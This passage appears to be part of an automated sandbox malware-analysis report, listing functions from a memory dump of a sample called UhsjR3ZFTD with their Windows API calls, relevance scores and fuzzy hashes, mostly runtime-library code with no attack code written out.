Instruction Fuzzy Hash: 90514BB1D0C1589ADB118E28DC84BF9BBAEEF15304F1401EAE589C7342E735AD45CFA2

Function 006C85D0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d43de84bc187dc49f72d02983a94e267a3cba507618ca99b47b12660cbf3b25
Instruction ID: 0053190aa128cc0d45669b81f6ba4f659d10be52dbd18972876ad25c54040401
Opcode Fuzzy Hash: 4d43de84bc187dc49f72d02983a94e267a3cba507618ca99b47b12660cbf3b25
Instruction Fuzzy Hash: 9A415C32A0011AAFCB24DF69C890EFDB7BAFF19314B54406AE541E7740EB31E945DBA4

Function 006D637D Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9b1b415963628f570de6a422f1b1eb8eef0b0df8d39529d3cae044db549de70
Instruction ID: 3aaf475109bbeb6113441f32a43c80a51c4e78342b7c1cffece59837758cd8f5
Opcode Fuzzy Hash: b9b1b415963628f570de6a422f1b1eb8eef0b0df8d39529d3cae044db549de70
Instruction Fuzzy Hash: B001B533A00215AF9B129F6CEC8096A33A7FBC5720B26A126F914CB355DB31EC11DBD0

Function 006D5361 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,006D72E5,?,?,006D72E5,00000220,?,?,?), ref: 006D5393

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5c32c3ef96cf9e7baf57665d9b0fe30b0744988201f6a5e9cf2eec05f027f964
Instruction ID: b86f7982187197bd3e9be543e5635a39695a7a6165fdb65477e1608a157c3636
Opcode Fuzzy Hash: 5c32c3ef96cf9e7baf57665d9b0fe30b0744988201f6a5e9cf2eec05f027f964
Instruction Fuzzy Hash: 2DE0E531E01A54E6DB222B658C00BEA3A8B9B427F0F130123FC17DAB91FFD0DC0089A5

Non-executed Functions

Function 006E0412 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 006E0629

Strings

1#INF, xrefs: 006E0548
1#IND, xrefs: 006E0517
1#QNAN, xrefs: 006E0525
1#SNAN, xrefs: 006E051E

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: f36f48fdc364cad7e74ad0eb14bde1b00e7ffc58b4d5c63806ed1470790eb811
Instruction ID: 5664b744faba90d51d10e2286bede527fbdbfea1b07b088b39b06e1aa12d8165
Opcode Fuzzy Hash: f36f48fdc364cad7e74ad0eb14bde1b00e7ffc58b4d5c63806ed1470790eb811
Instruction Fuzzy Hash: F4D23871E092688FDB65CE29CD407EAB7B6FB45304F1441EAD80DE7240EB78AE859F41

Function 006DAE27 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,006DA7DD,00000002,00000000,?,?,?,006DA7DD,?,00000000), ref: 006DAEC0
GetLocaleInfoW.KERNEL32(?,20001004,006DA7DD,00000002,00000000,?,?,?,006DA7DD,?,00000000), ref: 006DAEE9
GetACP.KERNEL32(?,?,006DA7DD,?,00000000), ref: 006DAEFE

Strings

ACP, xrefs: 006DAE45
OCP, xrefs: 006DAE7B

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 4935260367bbb3398feae65f36ee465ced9ca90d89c3e04461ef8a8e0cc46e7e
Instruction ID: a3fb779c51ef0d171e42a1d4165cc5294c3da53a0f1cafccb4eacd03a24c85dc
Opcode Fuzzy Hash: 4935260367bbb3398feae65f36ee465ced9ca90d89c3e04461ef8a8e0cc46e7e
Instruction Fuzzy Hash: EA21C572E08200A6DB348F95C900BD777A7EB94B60B5A8466E90ADB300E732DD41E352

Function 006DA6A7 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 006DA7AF
IsValidCodePage.KERNEL32(00000000), ref: 006DA7ED
IsValidLocale.KERNEL32(?,00000001), ref: 006DA800
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 006DA848
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 006DA863

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 3dbf42e3ec82ce1d086854f83580fb1b0725684768554a88691b25454a2ff00a
Instruction ID: 0264bcbfcfb28a30645a1f85456cb465a9d9a15d70cd275fa20013d583c040bc
Opcode Fuzzy Hash: 3dbf42e3ec82ce1d086854f83580fb1b0725684768554a88691b25454a2ff00a
Instruction Fuzzy Hash: 85516E75E04206AFDB50DFE4DC81AFA77BAFF08700F14456AE901EB390EB7199419B62

Function 006D34A0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e3378d954b4332bba990f659ed7c26a809c6bf1397c72b1adf76834141ef38
Instruction ID: c834cc8b419b4dd9201e287e4d8b2cfb8532693f29fa2e003de44d2b7d5f3269
Opcode Fuzzy Hash: a2e3378d954b4332bba990f659ed7c26a809c6bf1397c72b1adf76834141ef38
Instruction Fuzzy Hash: 60021D71E012299BDF14CFA9D8906EDFBF2FF48314F14826AE515E7340D731AA418B95

Function 006DB409 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006DB4F9

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 8f07adebd991efd1506afd4e7f92533d25c67b8584689649cadca2aa81327da1
Instruction ID: f0f39c5bf0c75166bcf40b63e9f7d0547b368991347a1756891ea693d85e7482
Opcode Fuzzy Hash: 8f07adebd991efd1506afd4e7f92533d25c67b8584689649cadca2aa81327da1
Instruction Fuzzy Hash: 3A71C071D051989FDF20EF249C89AFAB7BAEB05300F5551DEE009A7359EB318E848F58

Function 006C9AD3 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006C9ADF
IsDebuggerPresent.KERNEL32 ref: 006C9BAB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006C9BC4
UnhandledExceptionFilter.KERNEL32(?), ref: 006C9BCE

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 017f841f48c7800d22bc98802992ef81c7bcbdc1f0ce9c741b6e0017db4c07e9
Instruction ID: fe4f97ceb07a14972a51b8cf8d0f34adb6f609e96800abb75085056ff40ba68f
Opcode Fuzzy Hash: 017f841f48c7800d22bc98802992ef81c7bcbdc1f0ce9c741b6e0017db4c07e9
Instruction Fuzzy Hash: D53116B5D052189BDF60DFA4D989BDDBBB8EF08300F1041EAE40CAB250EB719A858F55

Function 006CA395 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 006CA3A7
GetCurrentThreadId.KERNEL32 ref: 006CA3B6
GetCurrentProcessId.KERNEL32 ref: 006CA3BF
QueryPerformanceCounter.KERNEL32(?), ref: 006CA3CC

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 48b013122d02ae7bb38361cab42a42950241af6db9e656eefe8ba0c301a3e47d
Instruction ID: dec05fdcb9db8343e7399ed20c1ec2875004ec4153a06a29c4e53bdb608a31cd
Opcode Fuzzy Hash: 48b013122d02ae7bb38361cab42a42950241af6db9e656eefe8ba0c301a3e47d
Instruction Fuzzy Hash: C3F0B234C0030DEBCB00DBB4C98898EBBF4FF1C200BA15996E412EB110E730AB44CB50

Function 006DA9A0 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006DA9F4
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006DAA3E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006DAB04

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 69bd45aca8630b11aea7338ea72ac8ea57fc82827018ef860a426de6f3f5d3ea
Instruction ID: 2d050c37e4c27a2ff7c1acec62ad18285da6a22a89560ff1004f3c09f1049b18
Opcode Fuzzy Hash: 69bd45aca8630b11aea7338ea72ac8ea57fc82827018ef860a426de6f3f5d3ea
Instruction Fuzzy Hash: 53618D719182079BDF689F64CD82BBA73AAEF44300F1441ABED06C6785E734D982DB52

Function 006D1AC0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006D1BB8
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006D1BC2
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 006D1BCF

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c792d79fdde0ed9eb99488fc0039e41240104fe18debc42e4d4939c11533a747
Instruction ID: 89ab303e868f68f40fae9864a6ed8be20b36c170d5d230c34168fccd110388f2
Opcode Fuzzy Hash: c792d79fdde0ed9eb99488fc0039e41240104fe18debc42e4d4939c11533a747
Instruction Fuzzy Hash: 2831C474D01228ABCB61DF68D989BDDBBB9FF08310F5051EAE41CA7261E7709B858F44

Function 006DE6FE Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,006DE659,?,?,00000008,?,?,006E53BB,00000000), ref: 006DE92B

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 00d23b2d27c462868b923f5c7217bfc5ef56b67c73685d74c9d51afa40b96fc7
Instruction ID: 99062e226fe97106dcbc462801938f4679972bbbe675d84e9490f87b4da74bfc
Opcode Fuzzy Hash: 00d23b2d27c462868b923f5c7217bfc5ef56b67c73685d74c9d51afa40b96fc7
Instruction Fuzzy Hash: D3B16D31A106088FD755DF28C496BA57BE2FF45364F29865AE899CF3A1C336D982CB40

Function 006C973B Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006C9751

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 327fd5ef29b8e1d561569dba17ef0c941a4271752b324f25d800269ed06301f8
Instruction ID: dc2f35cc29a4b665b2e9ee0a6d5a4f1ac231c32e4ab73cf0b150f6a7aab256fc
Opcode Fuzzy Hash: 327fd5ef29b8e1d561569dba17ef0c941a4271752b324f25d800269ed06301f8
Instruction Fuzzy Hash: 22A17CB19016098FEB18CF58D8957B9BBF2FB48354F18A52ED425EB351C3749A40CFA0

Function 006DB358 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006D6664: HeapAlloc.KERNEL32(00000008,?,?,?,006D57FF,00000001,00000364,00000002,000000FF,00000000,?,?,006CD6B5,00000000,?), ref: 006D66A5

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006DB4F9
FindNextFileW.KERNEL32(00000000,?), ref: 006DB5ED
FindClose.KERNEL32(00000000), ref: 006DB62C
FindClose.KERNEL32(00000000), ref: 006DB65F

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: 20a308930d3a8f882eec10912c95ca3081a60c320391dd0903c56d6eabb8c2c7
Instruction ID: c364570e5c8efcb700110a7d37b8f7c150de2a2f048a3d6e7cb33d7889bba26b
Opcode Fuzzy Hash: 20a308930d3a8f882eec10912c95ca3081a60c320391dd0903c56d6eabb8c2c7
Instruction Fuzzy Hash: E2510275D00258EFDF209F289C85AFE77AADF45314F16519EF4099730AEB308D419B64

Function 006DAC60 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006DACB4

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 4a5170d8345d4b9673c5eaed467ad20e1d506cf2cd866b2cf8436752f59b2b77
Instruction ID: f38c77aadf167ad9eeb5baff0bd342e23144cad40e6035be24fa88cba2d2c974
Opcode Fuzzy Hash: 4a5170d8345d4b9673c5eaed467ad20e1d506cf2cd866b2cf8436752f59b2b77
Instruction Fuzzy Hash: A021B072A19206ABDB28AF65DC42EBA73ABEF04311B10007FFD02D6741EB35ED00CA55

Function 006CDE42 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 006CDFC6

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c2331c5e33f8e004628fa293c3870a66871b9007b378f32423332b564d3f36e5
Instruction ID: 1c8d61a9468e2e4c4f7be5cef30756e680c9cf73e81e748f1c26b48a32c193c3
Opcode Fuzzy Hash: c2331c5e33f8e004628fa293c3870a66871b9007b378f32423332b564d3f36e5
Instruction Fuzzy Hash: 28B1C170A0060A8BCB249E68C955FFEB7B3FB15300F14462EE4639B791C732DA42CB95

Function 006DA8F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660

EnumSystemLocalesW.KERNEL32(006DA9A0,00000001,00000000,?,-00000050,?,006DA783,00000000,-00000002,00000000,?,00000055,?), ref: 006DA96A

Memory Dump Source

